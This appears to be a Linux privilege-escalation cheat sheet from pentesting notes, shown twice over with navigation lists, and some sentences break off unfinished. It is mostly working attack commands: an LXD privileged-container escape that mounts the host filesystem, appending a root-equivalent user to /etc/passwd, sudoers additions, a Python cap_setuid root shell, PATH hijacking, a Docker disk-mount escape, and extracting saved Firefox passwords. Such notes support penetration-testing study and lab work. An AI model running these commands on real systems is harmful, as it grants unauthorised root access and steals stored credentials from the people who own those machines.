Linux

Bash History

cat .bash_history

ID

There are some groups that are vulnerable:

USERS

Enumerate the users and try to access to them

ls /home

LXD

If lxc/lxd is not working USE THE FULL PATH

First download an Alpine image, then upload it to the remote machine.

git clone https://github.com/saghul/lxd-alpine-builder.git 
cd lxd-alpine-builder/ 
./build-alpine

A compressed file will be created. Now, we have to send this file to the victim machine

Once the file is copied, initiate LXD on the remote machine and proceed with the installation while answering "no" to all prompts, you can use the following command:

sudo lxd init --auto

Next, we run the following command to import the alpine image.

lxc image import <zip_file> --alias <name>

To check if the image is successfully imported, type the following.

lxc image list

Next, we need to make the container privileged, and mount the filesystem, before starting the container.

lxc init <name> mycontainer -c security.privileged=true 
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true lxc start mycontainer

Once the container is started, we can access it by typing the following command.

lxc exec mycontainer /bin/sh

Sudoers

sudo -l

Files belonging the user

find / -user user -o group user 2>/dev/null

SUID Privileges

We will have to look for that path have suid permissions, this will allow to be able to execute commands as the owner, that in case of being root is tensed.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Once we find one go to https://gtfobins.github.io/.

Cron Jobs

Path Hijacking

Abuse of incorrectly implemented permissions

Buscamos ficheros que permitan la escritura

find / -writable 2>/dev/null

The following command will look for files (and not symlinks etc) that are writable.

find / -not -type l -perm -o+w

Abusing Password Authentication

openssl passwd <PASSWORD>
echo "root2:FgKl.eqJO6s2g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL

Detection and Explotation of Capabilities

getcap -r / 2>/dev/null

Potential Escalate Privileges capabilities

cap_dac_read

Allows us to read any file from the system

cap_setuid

Allow us to change the uid of the user

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability in python 3.8 we can create a python file for changing our id and open a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell

Kernel Explotation

To see the linux version and the kernel put the commands:

lsb_release -a
uname -a

Locally Stored Credentials

Search for credentials by trying various options like username, password, db_username, db_password, db_user etc.

grep -nr "username"
grep -nr "upassword"

Mozilla Firefox files

ls -l .mozilla
ls -l .mozilla/firefox/
ls -l .mozilla/firefox/sj1c9rus.default
ls -l .mozilla/firefox/sj1c9rus.default/key4.db
ls -l .mozilla/firefox/sj1c9rus.default/logins.json

We can decrypt the protected passwords using direpwd:

python firepwd.py -d /root/

Enumerate local ports

netstat -tnlp
netstat -na -p tcp

If we detect ports that we don't detected initially we should forward the port to our machine and check what is inside.

motd.legal-displayed

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for external commands without absolute paths. For example using tar instead of /usr/bin/tar in a script.

Modifying `$PATH`

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tarexists in /tmp, it will run before the system's default tar.

Docker Escape

Enumerate the disks available

findmnt
lsblk
fdisk -l

Mount a folder with the disk contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Next, we access to the folder with the data

PreviousTools NextEnumeration

Last updated 22 days ago

Linux

Bash History

cat .bash_history

ID

There are some groups that are vulnerable:

USERS

Enumerate the users and try to access to them

ls /home

LXD

If lxc/lxd is not working USE THE FULL PATH

First download an Alpine image, then upload it to the remote machine.

git clone https://github.com/saghul/lxd-alpine-builder.git 
cd lxd-alpine-builder/ 
./build-alpine

A compressed file will be created. Now, we have to send this file to the victim machine

Once the file is copied, initiate LXD on the remote machine and proceed with the installation while answering "no" to all prompts, you can use the following command:

sudo lxd init --auto

Next, we run the following command to import the alpine image.

lxc image import <zip_file> --alias <name>

To check if the image is successfully imported, type the following.

lxc image list

Next, we need to make the container privileged, and mount the filesystem, before starting the container.

lxc init <name> mycontainer -c security.privileged=true 
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true lxc start mycontainer

Once the container is started, we can access it by typing the following command.

lxc exec mycontainer /bin/sh

Sudoers

sudo -l

We can use

Files belonging the user

find / -user user -o group user 2>/dev/null

SUID Privileges

We will have to look for that path have suid permissions, this will allow to be able to execute commands as the owner, that in case of being root is tensed.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Once we find one go to https://gtfobins.github.io/.

Cron Jobs

Path Hijacking

Abuse of incorrectly implemented permissions

Buscamos ficheros que permitan la escritura

find / -writable 2>/dev/null

Sino podemos utilizar una herramienta para detectar métodos para elevar privilegios

The following command will look for files (and not symlinks etc) that are writable.

find / -not -type l -perm -o+w

Abusing Password Authentication

openssl passwd <PASSWORD>
echo "root2:FgKl.eqJO6s2g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL

Detection and Explotation of Capabilities

getcap -r / 2>/dev/null

Potential Escalate Privileges capabilities

cap_dac_read

Allows us to read any file from the system

cap_setuid

Allow us to change the uid of the user

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability in python 3.8 we can create a python file for changing our id and open a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell

Kernel Explotation

To see the linux version and the kernel put the commands:

lsb_release -a
uname -a

We can use the

Locally Stored Credentials

Search for credentials by trying various options like username, password, db_username, db_password, db_user etc.

grep -nr "username"
grep -nr "upassword"

Mozilla Firefox files

ls -l .mozilla
ls -l .mozilla/firefox/
ls -l .mozilla/firefox/sj1c9rus.default
ls -l .mozilla/firefox/sj1c9rus.default/key4.db
ls -l .mozilla/firefox/sj1c9rus.default/logins.json

We can decrypt the protected passwords using direpwd:

python firepwd.py -d /root/

Enumerate local ports

netstat -tnlp
netstat -na -p tcp

If we detect ports that we don't detected initially we should forward the port to our machine and check what is inside.

motd.legal-displayed

If you find this file, there is a exploit for privesc:

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for external commands without absolute paths. For example using tar instead of /usr/bin/tar in a script.

Modifying `$PATH`

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tarexists in /tmp, it will run before the system's default tar.

Docker Escape

Enumerate the disks available

findmnt
lsblk
fdisk -l

Mount a folder with the disk contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Next, we access to the folder with the data

PreviousTools NextEnumeration

Last updated 22 days ago

Bash History

ID

USERS

LXD

Sudoers

Files belonging the user

SUID Privileges

Cron Jobs

Abuse of incorrectly implemented permissions

Detection and Explotation of Capabilities

Potential Escalate Privileges capabilities

cap_dac_read

Kernel Explotation

Locally Stored Credentials

Mozilla Firefox files

Enumerate local ports

motd.legal-displayed

Path Hijacking

Modifying $PATH

Docker Escape

Bash History

ID

USERS

LXD

Sudoers

Files belonging the user

SUID Privileges

Cron Jobs

Abuse of incorrectly implemented permissions

Detection and Explotation of Capabilities

Potential Escalate Privileges capabilities

cap_dac_read

Kernel Explotation

Locally Stored Credentials

Mozilla Firefox files

Enumerate local ports

motd.legal-displayed

Path Hijacking

Modifying $PATH

Docker Escape

Modifying `$PATH`

Modifying `$PATH`